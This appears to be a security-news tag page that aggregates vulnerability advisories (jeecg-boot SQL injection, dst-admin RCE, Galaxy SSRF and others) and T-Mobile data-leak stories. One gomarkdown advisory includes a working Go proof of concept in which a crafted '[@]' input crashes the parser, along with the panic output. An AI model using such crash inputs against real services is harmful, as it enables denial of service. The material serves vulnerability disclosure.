Tag

#git

90GB of Data Posted on Hacker Forum Linked to T-Mobile Glitch

By Waqas. Another day, another data security incident at T-Mobile – Because why not! A cybersecurity year without a T-Mobile… This is a post from HackRead.com.

HackRead
#git #auth
CVE-2023-40989: CVE-2023-40989/CVE-2023-40989 at main · Zone1-Z/CVE-2023-40989

SQL injection vulnerability in jeecgboot jeecg-boot v 3.0, 3.5.3 allows a remote attacker to execute arbitrary code via a crafted request to the report/jeecgboot/jmreport/queryFieldBySql component.

GHSA-m9xq-6h2j-65r2: Out-of-bounds Read while parsing citations

### Summary

Parsing malformed markdown input with a parser that uses the `parser.Mmark` extension could result in an out-of-bounds read vulnerability.

### Details

To exploit the vulnerability, the parser needs to have the `parser.Mmark` extension set. The panic occurs inside the `citation.go` file on line 69 when the parser tries to access the element past its length.

https://github.com/gomarkdown/markdown/blob/7478c230c7cd3e7328803d89abe591d0b61c41e4/parser/citation.go#L69

### PoC

```go
package main

import (
	"github.com/gomarkdown/markdown"
	"github.com/gomarkdown/markdown/parser"
)

func main() {
	// parser.Mmark must be set for the citation code path to be reached.
	ext := parser.CommonExtensions |
		parser.Attributes |
		parser.OrderedListStart |
		parser.SuperSubscript |
		parser.Mmark
	p := parser.NewWithExtensions(ext)

	// Malformed citation that triggers the out-of-bounds read.
	inp := []byte("[@]")
	markdown.ToHTML(inp, p, nil)
}
```

```bash
$ go run main.go
panic: runtime error: index out of range [1] with length 1

goroutine 1 [running]:
github.com/gomarkdown/markdown/parser.citation(0x10?, {0x1400000e3f0, 0x14000...
```

CVE-2023-43270: someCVE/dst-admin-RCE at main · Libestor/someCVE

dst-admin v1.5.0 was discovered to contain a remote command execution (RCE) vulnerability via the userId parameter at /home/playerOperate.

Elasticsearch 8.5.3 Stack Overflow

Elasticsearch version 8.5.3 stack overflow proof of concept exploit.

CVE-2023-42812: galaxy/lib/galaxy/files/uris.py at 06d56c859713b74f1c2e35da1c2fcbbf0a965645 · galaxyproject/galaxy

Galaxy is an open-source platform for FAIR data analysis. Prior to version 22.05, Galaxy is vulnerable to server-side request forgery, which allows a malicious user to issue arbitrary HTTP/HTTPS requests from the application server to internal hosts and read their responses. Version 22.05 contains a patch for this issue.

CVE-2023-42821: Out-of-bounds Read while parsing citations

The package `github.com/gomarkdown/markdown` is a Go library for parsing Markdown text and rendering it as HTML. Prior to pseudoversion `0.0.0-20230922105210-14b16010c2ee`, which corresponds with commit `14b16010c2ee7ff33a940a541d993bd043a88940`, parsing malformed markdown input with a parser that uses the `parser.Mmark` extension could result in an out-of-bounds read vulnerability. To exploit the vulnerability, the parser needs to have the `parser.Mmark` extension set. The panic occurs inside the `citation.go` file on line 69 when the parser tries to access the element past its length. This can result in a denial of service. Commit `14b16010c2ee7ff33a940a541d993bd043a88940`/pseudoversion `0.0.0-20230922105210-14b16010c2ee` contains a patch for this issue.

Taskhub 2.8.8 Cross Site Scripting

Taskhub version 2.8.8 suffers from a cross site scripting vulnerability.

T-Mobile spills billing information to other customers

Categories: News, Personal. Tags: T-Mobile, billing details, data breach, glitch.

T-Mobile customers recently found other subscribers' information on their online dashboards. The post T-Mobile spills billing information to other customers appeared first on Malwarebytes Labs.

CVE-2023-42798: Release Job Can Reset Git Root Repo to Nothing · Issue #93 · ChewKeanHo/AutomataCI

AutomataCI is a template git repository equipped with native built-in semi-autonomous CI tools. An issue in versions 1.4.1 and below can let a release job reset the git root repository to the first commit. Version 1.5.0 has a patch for this issue. As a workaround, make sure the `PROJECT_PATH_RELEASE` (e.g. `releases/`) directory is manually and properly `git cloned`, making it a different git repository from the root git repository.